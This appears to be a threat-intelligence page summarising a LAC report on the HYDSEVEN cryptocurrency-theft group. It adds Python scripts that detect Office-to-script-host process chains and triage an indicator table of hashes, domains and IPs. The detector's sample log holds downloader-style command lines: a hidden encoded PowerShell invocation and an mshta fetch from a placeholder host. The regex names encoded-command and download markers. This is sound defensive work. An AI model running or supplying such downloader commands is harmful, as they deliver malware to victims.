Cyber Emergency Center Report, Special Edition (サイバー救急センターレポート 特別編集号)
2019-06-19 • LAC • Cyber Emergency Center Report Special Edition
https://www.lac.co.jp/lacwatch/pdf/20190619_cecreport_sp.pdf
Attachments
20190619_cecreport_sp.pdf (6 MB)
LAC profiles HYDSEVEN as a cryptocurrency-theft group active from 2016 through 2019 against targets in several countries, including Japan and Poland. Spear-phishing is the common initial access vector: lure documents carry Office VBA macros or trigger Office/Windows exploit chains (CVE-2015-2545, CVE-2016-7255, CVE-2017-0199), and fake software installers serve as an alternative delivery path. The first stage is typically a PowerShell, HTA or VBScript downloader that fetches the main payload, NetWire or Ekoms/Mokes, which then talks to overseas C2 infrastructure. This excerpt does not attribute the activity to DPRK actors, so it is treated here as cryptocurrency-focused CTI context rather than as a Lazarus attribution.
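The macro/HTA-to-script-host chain described above is a straightforward parent-child process detection. The following is an added example, not code from the LAC report: it runs a simple rule over constructed process-creation log lines (a simplified key=value layout, not real Sysmon or EDR output) and flags an Office parent spawning powershell.exe, mshta.exe, wscript.exe or cscript.exe, raising severity when the child's command line carries an encoded-command or download marker. The field names, sample hosts and command lines are assumptions made for the example.

```python
"""Flag Office applications spawning script hosts (macro / HTA delivery chain).

Added example; the log format is a constructed key=value layout, not real Sysmon
or EDR output, and the sample lines below are made up for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Parents that should almost never launch a script interpreter on a workstation.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Children the report names as downloader stages (PowerShell, HTA, VBScript).
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line markers typical of a staged download: encoded commands, web fetches.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc(odedcommand)?\b|downloadstring|downloadfile|invoke-expression|\biex\b|https?://)",
    re.IGNORECASE,
)
# Constructed line layout: <utc> host=<name> parent="<path>" image="<path>" cmd="<args>"
LINE_RE = re.compile(
    r'^(?P<utc>\S+) host=(?P<host>\S+) parent="(?P<parent>[^"]*)" '
    r'image="(?P<image>[^"]*)" cmd="(?P<cmd>[^"]*)"$'
)


@dataclass(frozen=True)
class ProcessEvent:
    utc: str
    host: str
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, e.g. WINWORD.EXE -> winword.exe."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_events(text: str) -> list[ProcessEvent]:
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:  # lines that do not fit the constructed format are skipped
            events.append(ProcessEvent(m["utc"], m["host"], m["parent"], m["image"], m["cmd"]))
    return events


def assess(ev: ProcessEvent) -> Optional[dict]:
    """Return a finding if an Office parent spawned a script host, else None."""
    if basename(ev.parent_image) not in OFFICE_PARENTS:
        return None
    if basename(ev.image) not in SCRIPT_HOSTS:
        return None
    marker = SUSPICIOUS_ARGS.search(ev.command_line)
    return {
        "utc": ev.utc,
        "host": ev.host,
        "chain": f"{basename(ev.parent_image)} -> {basename(ev.image)}",
        # A download/encoded marker in the child's arguments is the strongest signal;
        # an Office parent launching a script host with a local script is still worth a look.
        "severity": "high" if marker else "medium",
        "marker": marker.group(0) if marker else "",
    }


def detect(text: str) -> list[dict]:
    return [f for f in map(assess, parse_events(text)) if f]


# Constructed sample: two malicious chains, two benign events, one ambiguous case.
SAMPLE_LOG = r"""
2019-03-26T09:12:01Z host=WS01 parent="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"
2019-03-26T09:12:05Z host=WS02 parent="C:\Program Files\Microsoft Office\Office16\EXCEL.EXE" image="C:\Windows\System32\mshta.exe" cmd="mshta http://example.invalid/update.hta"
2019-03-26T09:13:10Z host=WS01 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell Get-Service"
2019-03-26T09:14:00Z host=WS02 parent="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" image="C:\Windows\splwow64.exe" cmd="C:\Windows\splwow64.exe 12288"
2019-03-26T09:15:30Z host=WS03 parent="C:\Program Files\Microsoft Office\Office16\WINWORD.EXE" image="C:\Windows\System32\wscript.exe" cmd="wscript.exe C:\Users\a\AppData\Local\Temp\invoice.vbs"
"""

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The explorer-launched PowerShell and the print-spooler child of Word are left alone on purpose: the rule keys on the parent-child pair first and only then on arguments, which keeps it quiet on ordinary admin and Office activity while still catching a macro that drops a local .vbs before any network fetch.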
Indicators of Compromise
All HASH values are 32-character hexadecimal digests, i.e. MD5. URL entries ending in "…" are truncated in the extraction and cannot be used for exact matching. Several URL/DOMAIN rows (exatel.pl, nwjs.io, vms.drweb.co.jp, dreamincode.net) appear to be sources the report cites (a vendor blog, a project homepage, an antivirus vendor's malware database, a programming forum) rather than attacker infrastructure; confirm against the PDF before treating them as block targets.
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 89.34.111.113 | 2019-03-26 | 2020-01-01 |
| HASH | 786925ad4a4f91a98dd09508471ebddf | 2019-06-19 | 2019-06-19 |
| HASH | 91099aa413722d22aa50f85794ee386e | 2019-06-19 | 2019-06-19 |
| HASH | 58cf773d2eb957d48b931079b9c087dd | 2019-06-19 | 2019-06-19 |
| HASH | a63de560893500588a313e502be3efd2 | 2019-06-19 | 2019-06-19 |
| HASH | 80aa2d0c8c05a78487b85013c43c2143 | 2019-06-19 | 2019-06-19 |
| HASH | 8c1d6403f550a9ddb6640ade3f38a171 | 2019-06-19 | 2019-06-19 |
| HASH | a3e4801aa871f4e165bbd760333237b8 | 2019-06-19 | 2019-06-19 |
| HASH | f84d985b94e31c04b6823af150f0b96f | 2019-06-19 | 2019-06-19 |
| HASH | a86cf58cb8c3ed3ca3c89a2c0443d6d7 | 2019-06-19 | 2019-06-19 |
| HASH | b78c6850cc40b385e839498abc17fc98 | 2019-06-19 | 2019-06-19 |
| HASH | acf159e78dce7c5095640030a5a0d6d2 | 2019-06-19 | 2019-06-19 |
| HASH | 3d9a8ad7ae2bf9d4e4bd6381438d2b0c | 2019-06-19 | 2019-06-19 |
| HASH | 32f30ef97554b4e5993152252e57e86c | 2019-06-19 | 2019-06-19 |
| HASH | b76ae18bb4d86add42b3a9af7b880a39 | 2019-06-19 | 2019-06-19 |
| HASH | a6f3379cdf41f1cdf11ee071e3e40854 | 2019-06-19 | 2019-06-19 |
| HASH | 8ffa073c1d4860ec5ac05b53998b421d | 2019-06-19 | 2019-06-19 |
| HASH | c1aaf1f7652d483ae2d4712d05b5f0ad | 2019-06-19 | 2019-06-19 |
| HASH | 4df998fe61fc43803aed470fe52dc14e | 2019-06-19 | 2019-06-19 |
| HASH | b92c2bdb21b7eb6578bd4cb1ceb9eb64 | 2019-06-19 | 2019-06-19 |
| HASH | 0469be73633d45aea1665ddd31a1c694 | 2019-06-19 | 2019-06-19 |
| HASH | a650ccb18450dff911365aa830d1ecb9 | 2019-06-19 | 2019-06-19 |
| HASH | bae5d7736ff20f96528cde32c8c5e6cb | 2019-06-19 | 2019-06-19 |
| HASH | bf38f2371d30bc6ab6382626a4eba298 | 2019-06-19 | 2019-06-19 |
| HASH | a59252c2d3143dca47fb7e14d1b13d33 | 2019-06-19 | 2019-06-19 |
| HASH | 0943806cea1913227d2595dbcc2b94c0 | 2019-06-19 | 2019-06-19 |
| HASH | 16e55ba5c7870400cfa244ee211414d9 | 2019-06-19 | 2019-06-19 |
| HASH | ad9fa32f08638897fe126db894aa8260 | 2019-06-19 | 2019-06-19 |
| HASH | a20bb703d44d5717feb76fb36f571aea | 2019-06-19 | 2019-06-19 |
| HASH | 0f83e147217c156b7ab66a26cf865827 | 2019-06-19 | 2019-06-19 |
| HASH | bbae132bf631a093af5567e3fb540eee | 2019-06-19 | 2019-06-19 |
| HASH | a8ebaefd17089cce9efb8749926dca6d | 2019-06-19 | 2019-06-19 |
| HASH | a8d7582d9f7e9c2c8631351837817f2d | 2019-06-19 | 2019-06-19 |
| HASH | a9a32cd4275138e6ff9e3b1912b1163b | 2019-06-19 | 2019-06-19 |
| HASH | b7c546c7f72b78568ea99706d0343229 | 2019-06-19 | 2019-06-19 |
| HASH | acd18d845812ac288016c9610d1c9c39 | 2019-06-19 | 2019-06-19 |
| HASH | a26ef7c2b718f2b13240f6f9cf91c693 | 2019-06-19 | 2019-06-19 |
| HASH | ba3a1e3d00e04073e90bfcc744264067 | 2019-06-19 | 2019-06-19 |
| HASH | a4f27cd95be3ae069b285648c568f5ea | 2019-06-19 | 2019-06-19 |
| HASH | a5cbda7bb3864626d6251f3a8cd09cb7 | 2019-06-19 | 2019-06-19 |
| HASH | a4d1098a0c18c147e0b1bfa53cf6dd88 | 2019-06-19 | 2019-06-19 |
| HASH | b5c67058209e85fbc1f048e42ded9a48 | 2019-06-19 | 2019-06-19 |
| HASH | 2abe3cc4bff46455a945d56c27e9fb45 | 2019-06-19 | 2019-06-19 |
| HASH | 838e0e1bfdb8b26fa8bfca3d14b09b9f | 2019-06-19 | 2019-06-19 |
| HASH | 8c0ba5e0351975e8fc0c49fdb6dba4ff | 2019-06-19 | 2019-06-19 |
| HASH | afab14af38d50262b13a95e10cd7bba8 | 2019-06-19 | 2019-06-19 |
| HASH | a549d7ca2deb4aa7f7ce46efa1295e76 | 2019-06-19 | 2019-06-19 |
| HASH | 5f5847160dbfe0d6604dc5b6dd64ffb9 | 2019-06-19 | 2019-06-19 |
| HASH | ab235de113ee97926fb15eeaac555490 | 2019-06-19 | 2019-06-19 |
| HASH | c1e658bcda1b5ddaf7284fe5d219420d | 2019-06-19 | 2019-06-19 |
| HASH | fe84cb5d1832333e5e77cb6efdf5bfb6 | 2019-06-19 | 2019-06-19 |
| HASH | b8b776ebe5cf30c6dc1547ed35a79f42 | 2019-06-19 | 2019-06-19 |
| HASH | a502134c8f4b1d9a055375d79acfa9a9 | 2019-06-19 | 2019-06-19 |
| HASH | ab29919492a0cddabfe2d75c4d42d00d | 2019-06-19 | 2019-06-19 |
| HASH | aadb3437d9c0ede00b9a0672b7bfd0e1 | 2019-06-19 | 2019-06-19 |
| HASH | cb75044f5941530d963df9a626c813ae | 2019-06-19 | 2019-06-19 |
| HASH | ab28a1d4fbe377f4b08c40bbd96e7a51 | 2019-06-19 | 2019-06-19 |
| HASH | 2e4d861bdb438c9b3a3d6658d40d07b2 | 2019-06-19 | 2019-06-19 |
| HASH | a3ce918d207e725f89683cc2c768b454 | 2019-06-19 | 2019-06-19 |
| HASH | bb5f033b8717f42d5804b9c905fe9f50 | 2019-06-19 | 2019-06-19 |
| HASH | aa6cc819f92f26782194369096c02837 | 2019-06-19 | 2019-06-19 |
| HASH | b04e7cba062e23c9bbcc3b8ba38ab4da | 2019-06-19 | 2019-06-19 |
| HASH | abd9e42eb48a10ac1990fdfb03bd09a8 | 2019-06-19 | 2019-06-19 |
| HASH | 006bdb19b6936329bffd4054e270dc6a | 2019-06-19 | 2019-06-19 |
| HASH | a19829fed00d46c91d81f203fe9cb6c5 | 2019-06-19 | 2019-06-19 |
| HASH | a2480c9d205e90432daf4586809f3755 | 2019-06-19 | 2019-06-19 |
| HASH | b4376a7ef36f1357109e6b6362a71152 | 2019-06-19 | 2019-06-19 |
| HASH | a5838df9164d968b40fc5e2140c5ac99 | 2019-06-19 | 2019-06-19 |
| HASH | b1ebf98704fe7549be440692e48b0a72 | 2019-06-19 | 2019-06-19 |
| HASH | ad836caa03a5f1df34d9131922ffa495 | 2019-06-19 | 2019-06-19 |
| HASH | a5462407c447351788ef9ac5bae52c9d | 2019-06-19 | 2019-06-19 |
| HASH | b7a12cc9e44a55814fe9b0cc6aa7fb1e | 2019-06-19 | 2019-06-19 |
| HASH | fcb719e28da41dd7443017eb1f456ff3 | 2019-06-19 | 2019-06-19 |
| HASH | 9a9c3d7a44834f1d08ebdf3c9e5c3e62 | 2019-06-19 | 2019-06-19 |
| HASH | 796e62cc921af203c2dae93159f93f70 | 2019-06-19 | 2019-06-19 |
| HASH | aad72111d8d41e2edc0ab4e96613aa70 | 2019-06-19 | 2019-06-19 |
| HASH | a99a4d2a2cbc10f07d2bbcf0c1c91d0c | 2019-06-19 | 2019-06-19 |
| HASH | de3a8b1e149312dac5b8584a33c3f3c6 | 2019-06-19 | 2019-06-19 |
| HASH | d1f8ba71e08c27e753272eb61d7dd3eb | 2019-06-19 | 2019-06-19 |
| HASH | ba83abf043344d425cf39c612d0fb5c4 | 2019-06-19 | 2019-06-19 |
| HASH | a6f8ae86cf8725e16193e0fab0483c2c | 2019-06-19 | 2019-06-19 |
| HASH | ca584961b8292d3d075b57994883572a | 2019-06-19 | 2019-06-19 |
| HASH | a2d60db7db42adc8c3ab87b3dd244777 | 2019-06-19 | 2019-06-19 |
| HASH | afdc898cf874b74e68280185867250f9 | 2019-06-19 | 2019-06-19 |
| HASH | 796dff8007f3163adfcb9fa7f5fded1c | 2019-06-19 | 2019-06-19 |
| HASH | f08d3083c19320e2202128802b7ff306 | 2019-06-19 | 2019-06-19 |
| HASH | ab373d32f290e6928446f7f94e616c38 | 2019-06-19 | 2019-06-19 |
| HASH | b157c08db89d194eaa73c0723cf42b36 | 2019-06-19 | 2019-06-19 |
| HASH | a24aef033e061d358579250c6fed8e32 | 2019-06-19 | 2019-06-19 |
| URL | https://exatel.pl/paranoicy/ | 2019-06-19 | 2019-06-19 |
| URL | https://nwjs.io | 2019-06-19 | 2019-06-19 |
| URL | https://vms.drweb.co.jp/virus/?… | 2019-06-19 | 2019-06-19 |
| URL | https://vms.drweb.co.jp/virus/?… | 2019-06-19 | 2019-06-19 |
| URL | https://www.dreamincode.net/for… | 2019-06-19 | 2019-06-19 |
| DOMAIN | vms.drweb.co.jp | 2019-06-19 | 2019-06-19 |
| DOMAIN | statalicensesrv.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | kurgen3211a.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | gloria18611.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | kleboneonn12.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | dreamincode.net | 2019-06-19 | 2019-06-19 |
| DOMAIN | stata14lic.org | 2019-06-19 | 2019-06-19 |
| DOMAIN | en.nalog.io | 2019-06-19 | 2019-06-19 |
| DOMAIN | kaplaromenmmxs.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | jikenick12and67.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | exatel.pl | 2019-06-19 | 2019-06-19 |
| DOMAIN | jessiman901.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | anongfs671234d.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | homegwjskjl111.info | 2019-06-19 | 2019-06-19 |
| DOMAIN | g890ios20.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | cameforcameand33212.com | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.192 | 2019-06-19 | 2019-06-19 |
| IPv4 | 45.63.22.17 | 2019-06-19 | 2019-06-19 |
| IPv4 | 149.202.69.6 | 2019-06-19 | 2019-06-19 |
| IPv4 | 158.69.24.141 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.193 | 2019-06-19 | 2019-06-19 |
| IPv4 | 94.23.48.115 | 2019-06-19 | 2019-06-19 |
| IPv4 | 51.255.86.55 | 2019-06-19 | 2019-06-19 |
| IPv4 | 137.59.22.42 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.145 | 2019-06-19 | 2019-06-19 |
| IPv4 | 81.4.122.139 | 2019-06-19 | 2019-06-19 |
| IPv4 | 84.200.2.12 | 2019-06-19 | 2019-06-19 |
| IPv4 | 91.121.120.198 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.106.122.113 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.195 | 2019-06-19 | 2019-06-19 |
| IPv4 | 119.81.131.251 | 2019-06-19 | 2019-06-19 |
| IPv4 | 162.248.227.9 | 2019-06-19 | 2019-06-19 |
| IPv4 | 188.165.218.177 | 2019-06-19 | 2019-06-19 |
| IPv4 | 103.234.220.230 | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.82.21.65 | 2019-06-19 | 2019-06-19 |
| IPv4 | 46.165.194.94 | 2019-06-19 | 2019-06-19 |
| IPv4 | 146.185.170.48 | 2019-06-19 | 2019-06-19 |
| IPv4 | 37.235.48.233 | 2019-06-19 | 2019-06-19 |
| IPv4 | 46.165.249.77 | 2019-06-19 | 2019-06-19 |
| IPv4 | 130.255.185.77 | 2019-06-19 | 2019-06-19 |
| HASH | 12def981952667740eb06ee91168e643 | 2019-03-26 | 2019-06-19 |
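Before feeding a table like the one above to a blocklist or EDR watchlist, a practitioner would validate each value, drop non-routable or malformed entries, set aside truncated ones, and separate cited reference sites from real infrastructure. The following is an added example, not LAC's code: it parses the markdown table format used on this page and triages each row. The table embedded in the block is a constructed excerpt of the page's table plus three made-up rows (a private IP, a bad hash and a truncated URL, marked in the code) that exercise the validation paths; the list of reference hosts is an assumption made for the example.

```python
"""Triage an extracted IOC table before feeding it to blocklists or EDR.

Added example, not LAC's code. The table below is a constructed excerpt of the
page's table plus a few made-up rows (marked) that exercise the validation paths.
"""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from urllib.parse import urlsplit

MD5_RE = re.compile(r"[0-9a-f]{32}")
DOMAIN_RE = re.compile(r"(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}")
# Hosts in the table that look like sources the report cites (vendor blog, project
# homepage, AV virus database, programming forum), not attacker infrastructure.
# Assumption for this example; confirm against the PDF before relying on it.
REFERENCE_HOSTS = {"exatel.pl", "nwjs.io", "vms.drweb.co.jp", "dreamincode.net"}

IOC_TABLE = """\
| Type | Value | First Seen | Last Seen |
|---|---|---|---|
| IPv4 | 89.34.111.113 | 2019-03-26 | 2020-01-01 |
| HASH | 786925ad4a4f91a98dd09508471ebddf | 2019-06-19 | 2019-06-19 |
| HASH | 12def981952667740eb06ee91168e643 | 2019-03-26 | 2019-06-19 |
| URL | https://nwjs.io | 2019-06-19 | 2019-06-19 |
| URL | https://vms.drweb.co.jp/virus/?… | 2019-06-19 | 2019-06-19 |
| DOMAIN | vms.drweb.co.jp | 2019-06-19 | 2019-06-19 |
| DOMAIN | statalicensesrv.com | 2019-06-19 | 2019-06-19 |
| DOMAIN | kurgen3211a.com | 2019-06-19 | 2019-06-19 |
| IPv4 | 185.49.68.192 | 2019-06-19 | 2019-06-19 |
| URL | https://www.dreamincode.net/for… | 2019-06-19 | 2019-06-19 |
| IPv4 | 10.0.0.5 | 2019-06-19 | 2019-06-19 |
| HASH | not-a-hash | 2019-06-19 | 2019-06-19 |
| URL | https://statalicensesrv.com/dl/… | 2019-06-19 | 2019-06-19 |
"""
# The last three rows are constructed to show the invalid and truncated paths.


def parse_ioc_table(text: str) -> list[dict]:
    """Parse the page's markdown table into dicts; header and separator rows are skipped."""
    rows = []
    for line in text.splitlines():
        if not line.startswith("|") or line.startswith(("| Type", "|---")):
            continue
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 4:
            rows.append(dict(zip(("type", "value", "first_seen", "last_seen"), cells)))
    return rows


def is_reference(host: str) -> bool:
    return any(host == r or host.endswith("." + r) for r in REFERENCE_HOSTS)


def classify(row: dict) -> tuple[str, str]:
    """Return (status, reason): actionable | reference | truncated | invalid."""
    kind, value = row["type"].upper(), row["value"].strip()
    if kind == "HASH":
        if MD5_RE.fullmatch(value.lower()):
            return "actionable", "md5"
        return "invalid", "not a 32-hex MD5"
    if kind == "IPV4":
        try:
            ip = ipaddress.ip_address(value)
        except ValueError:
            return "invalid", "not an IP address"
        if ip.version != 4 or not ip.is_global:
            return "invalid", "not a globally routable IPv4"
        return "actionable", "ipv4"
    if kind in ("DOMAIN", "URL"):
        host = (urlsplit(value).hostname or "") if kind == "URL" else value.lower()
        if is_reference(host):
            return "reference", f"{host} is cited by the report, not C2"
        if value.endswith(("…", "...")):
            return "truncated", "value cut off in extraction; no exact match possible"
        if kind == "URL" and not value.lower().startswith(("http://", "https://")):
            return "invalid", "URL without http(s) scheme"
        if not DOMAIN_RE.fullmatch(host):
            return "invalid", f"bad hostname {host!r}"
        return "actionable", kind.lower()
    return "invalid", f"unknown type {kind}"


def triage(text: str) -> dict[str, list[str]]:
    out: dict[str, list[str]] = defaultdict(list)
    for row in parse_ioc_table(text):
        status, _ = classify(row)
        out[status].append(row["value"])
    return dict(out)


def blocklist(text: str) -> dict[str, list[str]]:
    """Actionable values grouped by type, lower-cased for case-insensitive matching."""
    groups: dict[str, set[str]] = defaultdict(set)
    for row in parse_ioc_table(text):
        if classify(row)[0] == "actionable":
            groups[row["type"].upper()].add(row["value"].lower())
    return {k: sorted(v) for k, v in groups.items()}


if __name__ == "__main__":
    for status, values in triage(IOC_TABLE).items():
        print(status, len(values), values)
```

Two caveats the triage does not remove: an IP that was actionable in 2019 may be reassigned hosting by now, so expire network indicators by their Last Seen date rather than blocking forever, and MD5 is fine for matching known samples but should not be the only identity for a file in a case record.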